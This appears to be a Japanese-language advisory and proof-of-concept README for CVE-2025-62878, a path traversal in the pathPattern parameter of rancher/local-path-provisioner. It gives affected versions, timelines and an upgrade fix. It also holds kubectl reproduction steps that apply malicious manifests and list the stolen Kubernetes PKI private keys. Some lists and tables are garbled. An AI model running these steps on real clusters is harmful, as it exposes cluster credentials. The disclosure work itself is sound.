
CVE-2025-62878
| 項目 | 値 |
|---|---|
| CVE ID | CVE-2025-62878 |
| GHSA ID | GHSA-jr3w-9vfr-c746 |
| 深刻度 | クリティカル (CVSS 10.0) |
| CWE | CWE-23 (相対パストラバーサル) |
| 影響を受けるコンポーネント | rancher/local-path-provisioner |
| 影響を受けるバージョン | v0.0.27 ~ v0.0.32 |
| 修正バージョン | v0.0.33+ |
StorageClass の pathPattern パラメータにパストラバーサル脆弱性が存在します。悪意のあるユーザーは相対パス要素(例: ../)を使用して pathPattern を操作し、設定されたベースディレクトリ制限をバイパスして、ホストノード上の任意の場所を指す PersistentVolume を作成できます。
これにより攻撃者は以下のことが可能になります:
/etc/kubernetes/pki/)注記: 公式の GitHub Advisory では "< 0.0.34" が影響を受けるとされていますが、弊社のテストにより以下が確認されています:
pathPattern 機能が存在しないため)| イベント | 日付 |
|---|---|
| pathPattern 機能の導入 | 2024-05-26 (コミット af85381) |
| 最初の脆弱性リリース (v0.0.27) | 2024-05-29 |
| 修正コミット | 2025-12-24 (コミット 1ed6b54) |
詳細な再現手順とスクリプトについては exploit/ ディレクトリを参照してください。
# 1. Install vulnerable version
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.30/deploy/local-path-storage.yaml
# 2. Apply exploit
kubectl apply -f exploit/malicious-storageclass.yaml
kubectl apply -f exploit/malicious-pvc.yaml
kubectl apply -f exploit/exploit-pod.yaml
# 3. Verify exploitation
kubectl get pv -o jsonpath='{.items[0].spec.hostPath.path}'
# Output: /etc/kubernetes/pki
kubectl exec pki-exploit-pod -- ls -la /stolen-pki/
# Shows Kubernetes PKI certificates and private keys
v0.0.33 以降にアップグレードしてください:
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.33/deploy/local-path-storage.yaml
| バージョン | リリース日 | pathPattern サポート | 脆弱性 |
|---|
| v0.0.26 | 2023-12-03 | なし | 安全 (機能なし) |
| v0.0.27 | 2024-05-29 | あり | 脆弱 |
| v0.0.28 | 2024-06-19 | あり | 脆弱 |
| v0.0.29 | 2024-09-03 | あり | 脆弱 |
| v0.0.30 | 2024-10-07 | あり | 脆弱 |
| v0.0.31 | 2025-01-24 | あり | 脆弱 |
| v0.0.32 | 2025-07-31 | あり | 脆弱 |
| v0.0.33 | 2025-12-25 | あり | 修正済み |
| v0.0.34 | 2026-01-06 | あり | 修正済み |
| 最初のパッチ適用リリース (v0.0.33) | 2025-12-25 |
| CVE 公開 | 2026-02-04 |